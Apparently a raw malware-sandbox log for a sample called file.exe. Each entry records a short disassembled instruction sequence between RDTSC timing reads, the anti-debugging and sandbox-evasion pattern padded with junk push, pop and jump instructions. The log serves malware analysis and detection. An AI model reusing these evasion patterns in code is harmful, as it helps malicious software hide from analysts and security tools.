              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBAB5 second address: 6DBABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBDAF second address: 6DBDB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E199E second address: 6E19A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E19A4 second address: 6E19C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC714E8FEE6h 0x0000000a jmp 00007FC714E8FEF0h 0x0000000f popad 0x00000010 pop edi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E19C5 second address: 6E19C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E19C9 second address: 6E19CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E19CD second address: 6E19D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E19D9 second address: 6E19DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E067E second address: 6E069A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC714E98435h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E069A second address: 6E069F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719D7A second address: 719D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719F2A second address: 719F3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC714E8FEEAh 0x00000009 jnp 00007FC714E8FEE6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719F3E second address: 719F42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719F42 second address: 719F62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC714E8FEF1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jns 00007FC714E8FEE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719F62 second address: 719F6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A292 second address: 71A2A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b jbe 00007FC714E8FEE6h 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A2A8 second address: 71A2AD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A2AD second address: 71A2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A40E second address: 71A413 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A57B second address: 71A597 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC714E8FEF0h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A597 second address: 71A59B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A6E8 second address: 71A6FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7235BA second address: 7235C7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC714E98426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 721C30 second address: 721C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 721DB1 second address: 721DB7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 721DB7 second address: 721DBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7220A2 second address: 7220A8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72223E second address: 722242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722242 second address: 72224D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72224D second address: 722253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722253 second address: 722280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC714E98432h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC714E98432h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7223EB second address: 722426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jc 00007FC714E8FEE6h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FC714E8FEF9h 0x00000013 jmp 00007FC714E8FEF3h 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722426 second address: 72242B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72242B second address: 722431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722431 second address: 72243E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FC714E98426h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72243E second address: 722448 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC714E8FEE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722448 second address: 72245A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop eax 0x0000000e push edi 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop edi 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72245A second address: 722463 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7225AC second address: 7225C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC714E98435h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722C5D second address: 722C61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722C61 second address: 722CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC714E9842Ch 0x0000000b pushad 0x0000000c jmp 00007FC714E98430h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jmp 00007FC714E98439h 0x0000001b popad 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722CA7 second address: 722CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722CAD second address: 722CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 722CB8 second address: 722CBE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7298A4 second address: 7298AE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC714E98426h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7298AE second address: 7298BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7298BC second address: 7298D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC714E98437h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7298D7 second address: 7298DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 735210 second address: 735227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC714E9842Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 735227 second address: 73522B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734F43 second address: 734F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73749C second address: 7374A2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D2FB second address: 73D301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74CF1F second address: 74CF24 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74CF24 second address: 74CF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66AB62 second address: 66AB66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66AB66 second address: 66AB6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66AB6A second address: 66AB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FC714E8FEEAh 0x0000000c push eax 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75530D second address: 755313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 755313 second address: 75532A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC714E8FEEAh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75532A second address: 75532E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75578C second address: 7557A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FC714E8FEEFh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7558EA second address: 7558EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7558EE second address: 75590C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC714E8FEF8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7592A5 second address: 7592B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FC714E98426h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7660A0 second address: 7660D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pushad 0x0000000a jp 00007FC714E8FEE6h 0x00000010 jmp 00007FC714E8FEF4h 0x00000015 popad 0x00000016 jng 00007FC714E8FEEAh 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 pop eax 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7660D8 second address: 7660DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7660DC second address: 7660E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7660E0 second address: 7660E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6659BE second address: 6659CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC714E8FEE6h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6659CC second address: 6659D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790F96 second address: 790F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790195 second address: 790199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790199 second address: 7901A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7901A7 second address: 7901AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790C6E second address: 790C91 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC714E8FEE6h 0x00000008 jmp 00007FC714E8FEF9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79263D second address: 792658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC714E98433h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795123 second address: 795127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79539A second address: 7953A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7953A3 second address: 7953A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795740 second address: 795744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795744 second address: 795748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 795748 second address: 795753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796915 second address: 796929 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEEEh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796929 second address: 79692D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79692D second address: 79695C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FC714E8FEFBh 0x00000010 jmp 00007FC714E8FEF5h 0x00000015 jmp 00007FC714E8FEEAh 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7982EC second address: 798329 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FC714E9842Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jno 00007FC714E98426h 0x00000012 jmp 00007FC714E98430h 0x00000017 pop edx 0x00000018 popad 0x00000019 push edi 0x0000001a push eax 0x0000001b push edx 0x0000001c jg 00007FC714E98426h 0x00000022 jno 00007FC714E98426h 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 798329 second address: 79832D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ACA58 second address: 6ACA5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5036A second address: 4E5036F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5036F second address: 4E503E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC714E98434h 0x00000009 sbb ax, 1508h 0x0000000e jmp 00007FC714E9842Bh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FC714E98438h 0x0000001a jmp 00007FC714E98435h 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov ebx, 1E2EB2AEh 0x0000002c call 00007FC714E9842Fh 0x00000031 pop esi 0x00000032 popad 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E503E4 second address: 4E50443 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 745Bh 0x00000007 call 00007FC714E8FEF0h 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 call 00007FC714E8FEEAh 0x0000001a pop eax 0x0000001b popad 0x0000001c pushfd 0x0000001d jmp 00007FC714E8FEEBh 0x00000022 adc cx, BD6Eh 0x00000027 jmp 00007FC714E8FEF9h 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50443 second address: 4E50447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50447 second address: 4E5045A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E8FEEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5052D second address: 4E50531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E50531 second address: 4E50537 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E804EC second address: 4E80525 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC714E98438h 0x00000008 add ah, 00000058h 0x0000000b jmp 00007FC714E9842Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov eax, 65B8470Fh 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e pop edx 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80525 second address: 4E8052B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8066B second address: 4E8067A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC714E9842Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
